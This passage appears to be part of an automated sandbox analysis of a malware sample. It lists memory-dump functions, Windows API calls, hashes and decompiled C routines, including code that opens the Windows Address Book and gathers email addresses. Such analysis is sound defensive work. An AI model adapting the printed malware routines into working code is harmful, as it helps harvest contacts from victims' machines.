GetCurrentThreadId.KERNEL32 ref: 0541CE15
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0541CE25
CloseHandle.KERNEL32(00000000), ref: 0541CE2E
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,000000FF,000000FF,0541D56D), ref: 0541CE4C
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,000000FF,000000FF,0541D56D), ref: 0541CE59

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FreeVirtual$CloseCurrentExchangeHandleInterlockedObjectSingleThreadWait
String ID:
API String ID: 2588964033-0
Opcode ID: cf816f4e62c1c556761c2477b32742a3fda3fb31709bb1ebe2eebcc422a96037
Instruction ID: f9497102e246415f9af2842a07bd36613e9ad4ae7af9dd84088d6b30bafd2473
Opcode Fuzzy Hash: cf816f4e62c1c556761c2477b32742a3fda3fb31709bb1ebe2eebcc422a96037
Instruction Fuzzy Hash: 52F04471250704ABD630AB75CC48F9BB7BCFF48610F100A2AF546C2590DB34E844CA29

Uniqueness

Uniqueness Score: -1.00%

Function 0541067D, Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0540E58F,?), ref: 05410685
GetVersion.KERNEL32 ref: 05410694
GetCurrentProcessId.KERNEL32 ref: 054106A3
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 054106C0
GetLastError.KERNEL32 ref: 054106DF

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: e9b7feb0d5cb8f10d6dc5393f8e7473d7d8033bb1acedf067d703077f8972e67
Instruction ID: 5203a46efb61e9b4f6c9a3311f5c3e760c6513ed60d8d6e423b3721fd28c0cfd
Opcode Fuzzy Hash: e9b7feb0d5cb8f10d6dc5393f8e7473d7d8033bb1acedf067d703077f8972e67
Instruction Fuzzy Hash: 8AF01D706643219BE378CF26AC0FBAD3EA9B744701F91451AF55AD62C0EB7040928B2E

Uniqueness

Uniqueness Score: -1.00%

Function 02777A5D, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02777A5D(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x277d224 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x277d214 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x277d210 = _t6;
				 *0x277d21c = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x277d20c = _t7;
				if(_t7 == 0) {
					 *0x277d20c =  *0x277d20c | 0xffffffff;
				}
				return 0;
			}

0x02777a65
0x02777a6d
0x02777a72
0x00000000
0x02777abf
0x02777a74
0x02777a7c
0x02777abc
0x00000000
0x02777abc
0x02777a7e
0x02777a83
0x02777a95
0x02777a9a
0x02777aa0
0x02777aa8
0x02777aad
0x02777aaf
0x02777aaf
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02778753,?,?,00000001), ref: 02777A65
GetVersion.KERNEL32(?,00000001), ref: 02777A74
GetCurrentProcessId.KERNEL32(?,00000001), ref: 02777A83
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 02777AA0
GetLastError.KERNEL32(?,00000001), ref: 02777ABF

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 9b5323f8f095fca3388435132b18dfa40820b04f2ea63e6b428428f2d6d313b1
Instruction ID: 535ecfd034ae88a79500689d5554087b3cc73546a128f92f9c56ca248223c8d5
Opcode Fuzzy Hash: 9b5323f8f095fca3388435132b18dfa40820b04f2ea63e6b428428f2d6d313b1
Instruction Fuzzy Hash: 90F01D70EC0301AEEB258F38AD09B167BA0AB18740F11CD1EF116D52D0E770812ACF68

Uniqueness

Uniqueness Score: -1.00%

Function 05414EDB, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,?,?,?,?), ref: 05414FBE
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,05407350), ref: 05415030
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 05415041

Part of subcall function 05415A40: RtlLeaveCriticalSection.NTDLL(?), ref: 05415ABD

Strings

HTTP/1.1 404 Not Found, xrefs: 05414FB6

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalFreeLeaveSectionmemcpy
String ID: HTTP/1.1 404 Not Found
API String ID: 4231733408-2072751538
Opcode ID: 76a8d5161bfb70ebbbcf1e7aef472b6b1af212a110b1efbaa329fcdce69d666e
Instruction ID: 4d0212f4a9bef8299878b3cf3e5f756bfba7cf70fe4f9759696efee1ab876220
Opcode Fuzzy Hash: 76a8d5161bfb70ebbbcf1e7aef472b6b1af212a110b1efbaa329fcdce69d666e
Instruction Fuzzy Hash: F4618031600606AFEB21CF65CA84FE6BBE5FF44340F54406AED0986B54E771E921CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0540A93F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

Email, xrefs: 0540A995, 0540A9A2

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: Email
API String ID: 1279760036-642995056
Opcode ID: 91572ed06fb1d2717698db979e3e1d0d35e3e8faf031d7c40ad3c7709fe335c1
Instruction ID: ff55962a85bbd863c1fbf771e08642539dee6bcc97c210198f6a7faf73b31a0e
Opcode Fuzzy Hash: 91572ed06fb1d2717698db979e3e1d0d35e3e8faf031d7c40ad3c7709fe335c1
Instruction Fuzzy Hash: 383190B2608305BFDB119F52CC89CAF7FA9FB88354F60492EF585900A0D731C955DB62

Uniqueness

Uniqueness Score: -1.00%

Function 05423085, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74synchronizationCOMMON

Download Yara Rule

APIs

RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 054230B9
RtlFreeAnsiString.NTDLL(00000000), ref: 05423139
WaitForSingleObject.KERNEL32(00000000,C000009A,00000000), ref: 05423146

Strings

?@, xrefs: 05423121

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: String$AnsiFreeObjectSingleUnicodeUpcaseWait
String ID: ?@
API String ID: 2603241602-3895805154
Opcode ID: 25c1dd751373e9e437b58f3510fe2b977c77549852b9d0e4bc6600d8cd78e525
Instruction ID: 19df1dce8d77f4ad93f61d725730e43528827b08998f2d53b1e248973d86fb60
Opcode Fuzzy Hash: 25c1dd751373e9e437b58f3510fe2b977c77549852b9d0e4bc6600d8cd78e525
Instruction Fuzzy Hash: 9921C2716087756BCB28DE6798898FBB7B9FB40210F804D6FF056C2250DB38D8548B62

Uniqueness

Uniqueness Score: -1.00%

Function 054089AC, Relevance: 6.3, APIs: 5, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 05408A36
HeapFree.KERNEL32(00000000,?), ref: 05408A47
HeapFree.KERNEL32(00000000,?), ref: 05408A5F
CloseHandle.KERNEL32(?), ref: 05408A79
HeapFree.KERNEL32(00000000,?), ref: 05408A8E

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: ef618c1d95fd0f0a188548932b99a70619b3e4b28308ce72b02887ccf49be123
Instruction ID: 5badc4a741301f741c23191bf79b201ca5409e6d748e6a723b7fbf4eb4b4387b
Opcode Fuzzy Hash: ef618c1d95fd0f0a188548932b99a70619b3e4b28308ce72b02887ccf49be123
Instruction Fuzzy Hash: 08317831605131AFC725DF65CE8889AFB6AFF44B403645466F409D3A94CB31ECA1CF94

Uniqueness

Uniqueness Score: -1.00%

Function 05402B3E, Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 0540505D: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 05405078
Part of subcall function 0540505D: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 054050C6
Part of subcall function 0540505D: GetProcAddress.KERNEL32(00000000,WABOpen), ref: 054050D8
Part of subcall function 0540505D: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 05405129

GetLastError.KERNEL32(?,?,?), ref: 05402CCC
FreeLibrary.KERNEL32(?,?,?), ref: 05402D34

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: 805450105cbe8be41564327a969f46fd481ddb147d5b3e16bc4ef9c12d3f1593
Instruction ID: 9550c9e19c7ea43f1c8a5a1509fb8720a99248e6a61f4a3c5f57468fe2a719b5
Opcode Fuzzy Hash: 805450105cbe8be41564327a969f46fd481ddb147d5b3e16bc4ef9c12d3f1593
Instruction Fuzzy Hash: EC711B75E04209EFCF10DFE5C9889EEBBB9FF48314B2094AAE516A7290D7719941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 027714BD, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E027714BD(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x277d230; // 0x27ba5a8
					_t5 = _t102 + 0x277e038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x277c2c8);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x277d230; // 0x27ba5a8
												_t28 = _t108 + 0x277e0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x277d230; // 0x27ba5a8
														_t33 = _t78 + 0x277e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x027714c2
0x027714cb
0x027714cc
0x027714d0
0x027714d6
0x027714dc
0x027714e5
0x027714eb
0x027714f5
0x027714f7
0x027714fd
0x02771502
0x0277150d
0x02771515
0x02771518
0x0277163b
0x0277151e
0x0277151e
0x0277152b
0x02771531
0x02771537
0x0277153b
0x02771541
0x0277154e
0x02771552
0x02771558
0x0277155b
0x02771561
0x02771567
0x0277156d
0x02771570
0x02771573
0x02771579
0x02771582
0x02771588
0x02771589
0x0277158c
0x0277158d
0x0277158e
0x02771596
0x02771597
0x02771598
0x0277159a
0x0277159e
0x027715a2
0x00000000
0x00000000
0x027715a8
0x027715b1
0x027715b7
0x027715c1
0x027715c5
0x027715c7
0x027715d4
0x027715d8
0x027715e0
0x027715e5
0x027715f7
0x027715f9
0x027715ff
0x027715ff
0x02771608
0x02771608
0x0277160a
0x02771610
0x02771610
0x02771613
0x02771619
0x0277161c
0x02771625
0x00000000
0x00000000
0x00000000
0x02771625
0x02771579
0x02771573
0x0277155b
0x0277162b
0x0277162b
0x02771631
0x02771631
0x02771637
0x02771637
0x02771640
0x02771646
0x02771646
0x02771502
0x0277164f

APIs

SysAllocString.OLEAUT32(0277C2C8), ref: 0277150D
lstrcmpW.KERNEL32(00000000,0076006F), ref: 027715EF
SysFreeString.OLEAUT32(00000000), ref: 02771608
SysFreeString.OLEAUT32(?), ref: 02771637

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 9a622db0b0223b346eac268c3daaa5ee2832ad0a1f7f870e45e23d8005d54af0
Instruction ID: 8b9ab82ed757dbf52289bcf2bd30b1a0cbc447af6441aa76772c1ec31f458abe
Opcode Fuzzy Hash: 9a622db0b0223b346eac268c3daaa5ee2832ad0a1f7f870e45e23d8005d54af0
Instruction Fuzzy Hash: 26515F71D00519DFCF11DFA8C988CAEB7BAFF88704B148599E905EB210DB719E02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054113EC, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 05411499
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 054114AF
memset.NTDLL ref: 0541154F
memset.NTDLL ref: 0541155F

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 2b66ab5afe8d3ac4ff3649ea942feb8bccf1f797a53a962c130a6f9b0ac2ae4b
Instruction ID: d981c52388e161ede239fd71725e660f040c35c60a22aaeeee3430bbe41e86f6
Opcode Fuzzy Hash: 2b66ab5afe8d3ac4ff3649ea942feb8bccf1f797a53a962c130a6f9b0ac2ae4b
Instruction Fuzzy Hash: 2F41C231B00219ABDB10DFA9CC84FEE7775EF44710F10852AFE1AAB280EB70A945DB54

Uniqueness

Uniqueness Score: -1.00%

Function 027744C2, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E027744C2(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E027743C6(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E0277A966(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02778B07(_t101,  &_v236, _a8, _t96 - _t81);
					E02778B07(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E0277A966(_t101, 0x277d168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E0277A966(_a16, _a4);
						E02773A1E(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0277AEE0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0277AEDA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E027747A0(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E0277337A(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E027772D3(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x277d168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x027744c5
0x027744d1
0x027744d7
0x027744dc
0x027744e0
0x0277463d
0x02774641
0x02774641
0x027744e6
0x027744ea
0x027744f0
0x027744f1
0x027744fc
0x02774502
0x02774507
0x0277450a
0x02774524
0x02774530
0x02774539
0x02774543
0x02774548
0x0277454a
0x0277454d
0x027745fb
0x02774601
0x02774612
0x02774625
0x02774635
0x00000000
0x0277463a
0x02774556
0x0277455d
0x02774561
0x02774567
0x02774569
0x0277456b
0x0277456d
0x0277456f
0x02774579
0x0277457e
0x02774580
0x02774582
0x02774583
0x02774584
0x02774585
0x0277458c
0x02774593
0x02774596
0x02774596
0x02774563
0x02774563
0x02774563
0x0277459e
0x027745a6
0x027745af
0x027745b4
0x027745b4
0x027745b9
0x00000000
0x00000000
0x027745bb
0x027745be
0x027745c8
0x00000000
0x00000000
0x027745ca
0x027745ca
0x027745d4
0x027745b4
0x027745b9
0x00000000
0x00000000
0x00000000
0x027745b9
0x027745de
0x027745e1
0x027745e4
0x027745eb
0x027745eb
0x027745f8
0x00000000
0x027745f8
0x027744f3
0x027744f7
0x027744f8
0x027744fa
0x00000000
0x00000000
0x00000000
0x027744fa
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 0277456F
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02774585
memset.NTDLL ref: 02774625
memset.NTDLL ref: 02774635

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 08276b635cca57736000b8dd9aca6248e1fcc531618c9cdf061fb14b36767063
Instruction ID: bd1e686255cf04d91fdd735d60a79306ffe2bdc37175753584c49b4bdf425700
Opcode Fuzzy Hash: 08276b635cca57736000b8dd9aca6248e1fcc531618c9cdf061fb14b36767063
Instruction Fuzzy Hash: 7041B471A00259ABDF21DFA8CC94BEE77BAEF49310F008529F919AB180DB709E54CF50

Uniqueness

Uniqueness Score: -1.00%

Function 054167A8, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(054283AC,0542838C), ref: 054168E8

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

Part of subcall function 054260BE: lstrlenW.KERNEL32(?,00000000,?,?,00000000,05401499,00000000), ref: 054260CF
Part of subcall function 054260BE: lstrlenW.KERNEL32(0542A4D8,00000000,?,00000000,05401499,00000000), ref: 054260E6

Strings

1.0, xrefs: 054167D2
A8000A, xrefs: 054167D7
EmailAddressCollection/EmailAddress[%u]/Address, xrefs: 0541686B

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateErrorHeapLast
String ID: 1.0$A8000A$EmailAddressCollection/EmailAddress[%u]/Address
API String ID: 3415590935-2884085418
Opcode ID: 9391205e45d3d244384e8722bfe695513d1afe5d2c0c400da9eeec22bd58bebe
Instruction ID: 5099eb45b2510fabb2e1137b9b9b07daeb237acc9ca522325be249dc767b2c8b
Opcode Fuzzy Hash: 9391205e45d3d244384e8722bfe695513d1afe5d2c0c400da9eeec22bd58bebe
Instruction Fuzzy Hash: F8413AB5B00215AFDB10DFA5C888EAEB7B9FF88704B2544A9E805EB350DB71D901CB64

Uniqueness

Uniqueness Score: -1.00%

Function 027743A3, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E027743A3(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x277d138() != 0) {
								_v8 = 8;
							} else {
								_t47 = E027775C4(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x277d224, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E02774C31(_v20);
											if(_v8 == 0) {
												_v8 = E02774036(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E02777F7F(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x027743a4
0x027743aa
0x027743b5
0x027743b5
0x027743b7
0x02776e0b
0x02776e0e
0x02776e17
0x02776e1a
0x02776e1d
0x02776e25
0x02776f23
0x02776f2e
0x02776f31
0x02776f33
0x00000000
0x02776f33
0x02776e2b
0x02776e2e
0x02776f36
0x02776f36
0x02776e34
0x02776e37
0x02776e38
0x02776e3a
0x02776e43
0x02776f1a
0x02776e49
0x02776e4f
0x02776e56
0x02776e59
0x02776f08
0x02776e5f
0x00000000
0x02776e5f
0x02776e5f
0x02776e5f
0x02776e5f
0x02776e64
0x02776e66
0x02776e66
0x02776e73
0x02776e7b
0x00000000
0x00000000
0x02776e7d
0x02776e8a
0x02776e90
0x02776e90
0x02776e93
0x00000000
0x00000000
0x02776e95
0x02776ea0
0x02776eb4
0x02776eea
0x02776eb6
0x02776eb6
0x02776ebd
0x02776ec5
0x00000000
0x02776ec7
0x02776ec7
0x02776ed2
0x02776ed5
0x02776edc
0x00000000
0x02776edc
0x02776ed5
0x02776ec5
0x02776eed
0x02776ef0
0x02776ef8
0x02776f03
0x02776f03
0x00000000
0x02776ef8
0x02776e9d
0x00000000
0x02776edf
0x02776edf
0x00000000
0x02776ee8
0x02776f0f
0x02776f0f
0x02776f15
0x02776f15
0x02776e43
0x02776e2e
0x02776f40
0x027743ac
0x027743ac
0x027743b3
0x027743be
0x00000000
0x00000000
0x00000000
0x027743b3

APIs

WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,02776CD4,00000000,?), ref: 02776EA7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02776CD4,00000000,?,?), ref: 02776EC7

Part of subcall function 02777F7F: wcstombs.NTDLL ref: 0277803F

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID:
API String ID: 2344289193-0
Opcode ID: 0ae5b2944a93c3fc35afe439bde23019e39aaaebcc91d834ca20f92be6d6b73e
Instruction ID: 8e2556429ab4a4c9023ce898fd8c56f47059f5339803413d7f9b551a15eb235a
Opcode Fuzzy Hash: 0ae5b2944a93c3fc35afe439bde23019e39aaaebcc91d834ca20f92be6d6b73e
Instruction Fuzzy Hash: 954117B1D00609EFDF21DFA5D984AAEBBB9FF09345F54886EE401E2144E7709A44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0541D65C, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON

Download Yara Rule

APIs

